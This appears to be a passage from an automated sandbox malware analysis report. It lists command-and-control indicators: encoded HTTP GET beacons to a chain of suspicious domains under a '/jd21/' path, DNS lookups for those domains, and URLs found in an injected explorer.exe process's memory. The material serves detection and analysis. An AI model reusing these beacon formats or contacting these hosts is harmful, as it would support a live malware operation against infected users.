Source: global traffic, HTTP traffic detected: GET /jd21/?Bl=8pSpW470ix&FjUh5xw=DIIN6Z9zLP/ZrbxmBcZ1Ou48L9Vhs8Bu5i/IWLuuzYtgkis57dND5dtWqk2syhOy20nI HTTP/1.1 Host: www.walk-in-tubs-30303.bond Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /jd21/?Bl=8pSpW470ix&FjUh5xw=b/Dc4UkLHLZk59X8SmhgJ1uv172ipMqzAxiQNMhexpG5XWQ9Iwkd+tXAg5/cR36jPrSP HTTP/1.1 Host: www.pools-80761.bond Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic, HTTP traffic detected: GET /jd21/?FjUh5xw=G0sie2NHVCWw+0/kSEW2r2lr5bZg+lb5pplTBgNoV81oGr9NI8ZMsYInSB9p2CdIvtzo&Bl=8pSpW470ix HTTP/1.1 Host: www.legendhud.shop Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.circusenergy.online
          Source: global trafficDNS traffic detected: DNS query: www.cyber-eu.digital
          Source: global trafficDNS traffic detected: DNS query: www.weight-loss-003.today
          Source: global trafficDNS traffic detected: DNS query: www.xmld101.icu
          Source: global trafficDNS traffic detected: DNS query: www.walk-in-tubs-30303.bond
          Source: global trafficDNS traffic detected: DNS query: www.r86gd377hi.rent
          Source: global trafficDNS traffic detected: DNS query: www.thetrue.one
          Source: global trafficDNS traffic detected: DNS query: www.tvtwenty20sr.top
          Source: global trafficDNS traffic detected: DNS query: www.pools-80761.bond
          Source: global trafficDNS traffic detected: DNS query: www.legendhud.shop
          Source: global trafficDNS traffic detected: DNS query: www.borghardt.xyz
          Source: global trafficDNS traffic detected: DNS query: www.slab-leak-repair-74697.bond
          Source: explorer.exe, 00000003.00000003.3092275070.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3851024498.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.00000000087BB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000003.00000003.3092275070.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3851024498.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.00000000087BB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000003.00000003.3092275070.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3851024498.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.00000000087BB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000003.00000003.3092275070.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3851024498.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.00000000087BB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000003.00000000.1455128330.0000000002C60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1461856783.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3850369503.00000000082D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.alqahtani.site
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.alqahtani.site/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.alqahtani.site/jd21/www.propertiesforrentus11.bond
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.alqahtani.siteReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.apple0ficial-ld.info
          Source: explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.apple0ficial-ld.info/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.apple0ficial-ld.infoReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.borghardt.xyz
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.borghardt.xyz/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.borghardt.xyz/jd21/www.slab-leak-repair-74697.bond
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.borghardt.xyzReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.circusenergy.online
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.circusenergy.online/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.circusenergy.online/jd21/www.cyber-eu.digital
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.circusenergy.onlineReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.cyber-eu.digital
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.cyber-eu.digital/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.cyber-eu.digital/jd21/www.weight-loss-003.today
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.cyber-eu.digitalReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.legendhud.shop
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.legendhud.shop/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.legendhud.shop/jd21/www.borghardt.xyz
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.legendhud.shopReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.pools-80761.bond
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.pools-80761.bond/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.pools-80761.bond/jd21/www.legendhud.shop
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.pools-80761.bondReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.propertiesforrentus11.bond
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.propertiesforrentus11.bond/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.propertiesforrentus11.bond/jd21/www.apple0ficial-ld.info
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.propertiesforrentus11.bondReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.r86gd377hi.rent
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.r86gd377hi.rent/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.r86gd377hi.rent/jd21/www.thetrue.one
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.r86gd377hi.rentReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.slab-leak-repair-74697.bond
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.slab-leak-repair-74697.bond/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.slab-leak-repair-74697.bond/jd21/www.tyumk.xyz
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.slab-leak-repair-74697.bondReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.thetrue.one
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.thetrue.one/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.thetrue.one/jd21/www.tvtwenty20sr.top
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.thetrue.oneReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.tvtwenty20sr.top
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.tvtwenty20sr.top/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.tvtwenty20sr.top/jd21/www.pools-80761.bond
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.tvtwenty20sr.topReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.tyumk.xyz
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.tyumk.xyz/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.tyumk.xyz/jd21/www.alqahtani.site
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.tyumk.xyzReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.walk-in-tubs-30303.bond
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.walk-in-tubs-30303.bond/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.walk-in-tubs-30303.bond/jd21/www.r86gd377hi.rent
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.walk-in-tubs-30303.bondReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.weight-loss-003.today
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.weight-loss-003.today/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.weight-loss-003.today/jd21/www.xmld101.icu
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.weight-loss-003.todayReferer:
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.xmld101.icu
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.xmld101.icu/jd21/
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.xmld101.icu/jd21/www.walk-in-tubs-30303.bond
          Source: explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.xmld101.icuReferer:
          Source: explorer.exe, 00000003.00000000.1469409871.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292310130.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3858182302.000000000BD22000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(
          Source: explorer.exe, 00000003.00000002.3858634071.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1469409871.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085893372.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2291497352.000000000BDE7000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000003.00000002.3858634071.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1469409871.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085893372.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2291497352.000000000BDE7000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOSJM
